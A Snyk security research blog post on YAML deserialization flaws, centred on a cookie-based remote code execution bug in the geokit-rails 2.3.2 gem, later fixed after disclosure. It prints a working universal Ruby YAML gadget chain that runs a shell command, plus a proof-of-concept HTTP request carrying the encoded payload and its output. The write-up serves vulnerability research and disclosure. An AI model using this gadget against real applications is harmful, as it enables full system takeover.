Finding YAML Injection with Snyk Code

Written by:
Calum Hutton
Calum Hutton

February 23, 2023

0 mins read

I conducted some research to try and identify YAML Injection issues in open-source projects using Snyk Code. Though the vulnerability itself is not a new one, the potential impact of YAML Injection is high, which made it a good candidate for research. This research led to the discovery of several issues in open-source projects written in Python, PHP and Ruby. This article focuses on the issue found in geokit-rails version 2.3.2, a plugin for Ruby on Rails


YAML is more than a mere data interchange format such as JSON, the specification describes a number of advanced features that make it ripe for security investigation such as:

  • Custom tags (i.e. PyYAML)

  • Anchors and aliases

  • Merged attributes

  • Multiple-document streams

YAML can also be used to serialize binary data and arbitrary objects in various languages, potentially leading to deserialization vulnerabilities. These vulnerabilities are the target of this research, since successful exploitation often leads to Remote Code Execution (RCE).

YAML deserialization in Ruby

In Ruby, YAML parsing is built into the core language, so no additional libraries are needed. If an application uses the builtin Ruby YAML parser, it is vulnerable to deserialization attacks if YAML.load() or YAML.load_file() is used instead of YAML.safe_load() or YAML.safe_load_file(), respectively. An alternative, safe-by-default YAML parser is available in the SafeYAML project.

The following script and output demonstrate an unsafe way to load YAML with YAML.load().

1require 'yaml'
3var = {
4 id: 1,
5 desc: 'A simple hash'
8yaml = '---
9:id: 1
10:desc: A simple hash'
12puts var
13puts YAML.load(yaml)
15# Prints:
17{:id=>1, :desc=>"A simple hash"}
18{:id=>1, :desc=>"A simple hash"}

The var variable holds a simple Ruby hash, with the yaml variable containing the equivalent hash, serialized in YAML form. Both putsstatements display the same hash, because the yaml variable has been deserialized back from a YAML string into a hash via YAML.load(). More complex objects can also be serialized and deserialized in this way. 

During the initial stages of this research, I came across a Universal Ruby YAML deserialization gadget that was effective on Ruby versions 2.x to 3.x. which, when deserialized, would trigger arbitrary command execution.

2- !ruby/object:Gem::Installer
3    i: x
4- !ruby/object:Gem::SpecFetcher
5    i: y
6- !ruby/object:Gem::Requirement
7  requirements:
8    !ruby/object:Gem::Package::TarReader
9    io: &1 !ruby/object:Net::BufferedIO
10      io: &1 !ruby/object:Gem::Package::TarReader::Entry
11         read: 0
12         header: "abc"
13      debug_output: &1 !ruby/object:Net::WriteAdapter
14         socket: &1 !ruby/object:Gem::RequestSet
15             sets: !ruby/object:Net::WriteAdapter
16                 socket: !ruby/module 'Kernel'
17                 method_id: :system
18             git_set: id
19         method_id: :resolve

The above YAML payload will execute the id command upon deserialization if it is parsed via YAML.load() or YAML.load_file().

Case study: geokit-rails (2.3.2)

The geokit-rails gem is a plugin for Ruby on Rails that provides location services for the application. The plugin uses the unsafe YAML.load() method via the retrieve_location_from_cookie_or_service() method in geokit-rails/ip_geocode_lookup.rb:

1# Uses the stored location value from the cookie if it exists.  If
2# no cookie exists, calls out to the web service to get the location.
3def retrieve_location_from_cookie_or_service
4 return[:geo_location])) if cookies[:geo_location]
5 location = Geocoders::MultiGeocoder.geocode(get_ip_address)
6 return location.success ? location : nil

The data flowing into the unsafe YAML.load() method originates from the Ruby on Rails cookies parameter, which holds the cookies sent in the request. This is good news for an attacker as the cookies can be directly controlled by crafting the appropriate HTTP request. 

Proof of concept

I set up a Rails application running the geokit-rails plugin (version 2.3.2) on Ruby 3.0.0. The following HTTP request was sent to the application to exploit the issue. It includes the URL-encoded YAML payload in the geo_location cookie.

3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5Accept-Language: en-GB,en;q=0.5
6Connection: keep-alive
7Upgrade-Insecure-Requests: 1
8Sec-Fetch-Dest: document
9Sec-Fetch-Mode: navigate
10Sec-Fetch-Site: none
11Sec-Fetch-User: ?1
12Content-Length: 0
13Cookie: geo_location=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2Fobject%3AGem%3A%3ARequirement%0A++requirements%3A%0A++++%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%0A++++io%3A+%261+%21ruby%2Fobject%3ANet%3A%3ABufferedIO%0A++++++io%3A+%261+%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%3A%3AEntry%0A+++++++++read%3A+0%0A+++++++++header%3A+%22abc%22%0A++++++debug_output%3A+%261+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++socket%3A+%261+%21ruby%2Fobject%3AGem%3A%3ARequestSet%0A+++++++++++++sets%3A+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++++++++++socket%3A+%21ruby%2Fmodule+%27Kernel%27%0A+++++++++++++++++method_id%3A+%3Asystem%0A+++++++++++++git_set%3A+id%0A+++++++++method_id%3A+%3Aresolve; _my_rails_app_session=%2B48ny21MkgVzlJR4LMcsdNtOK0G1aHx0%2Byoz4xLnkaMHrCner7YSRfQ04notQ0oNesQdG4EV5T%2FpyrQBSKBdKOZLLvP2J1NLOAQe1Z5zTTuu5Grcw1wuRpIHKAmZjfj3bqKqghkOj1JpOBxJoxFS7L6cH3wIsoq%2FrK%2BlAxVvP%2F8F9g5Q%2FA3pLVj2DTF3l7CcDBzOE9cPCOShesP717YbZNoa%2BPNf3mGjmKWvq26Y3CKMg2z7mAJHA%2B0CdA9l2pXsbrgwRJUW3Epqx4eJt0%2FDCJgS6Mp7rGjQeoIqLj4%3D--YAEA%2FepI0t701ifo--fVitYcX5PORz3a9xN4ev4A%3D%3D; __profilin=p%3Dt

Within the Rails application, the payload was deserialized and executed, running the id command to prove command execution.

1Started GET "/vulns" for at 2022-11-07 12:05:57 +0000 Processing by VulnsController#index as HTML 
2sh: reading: command not found 
3uid=501(calumh) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(,33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(,398(,399(,400( 
4Completed 500 Internal Server Error in 167ms (Allocations: 35610)

For a system utilizing geokit-rails, an attacker exploiting this vulnerability could initiate RCE, potentially allowing for total system takeover. 


This issue was responsibly disclosed to the maintainer of geokit-rails and was fixed in version 2.5.0 of the software by replacing the YAML containing the coordinate information with JSON. From this research, Snyk Code’s rules to detect YAML injection were improved and enhanced, meaning even more of these issues should now be detectable in user projects. 

Patch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo Segment

Snyk is a developer security platform. Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. Supported by industry-leading application and security intelligence, Snyk puts security expertise in any developer’s toolkit.

Start freeBook a live demo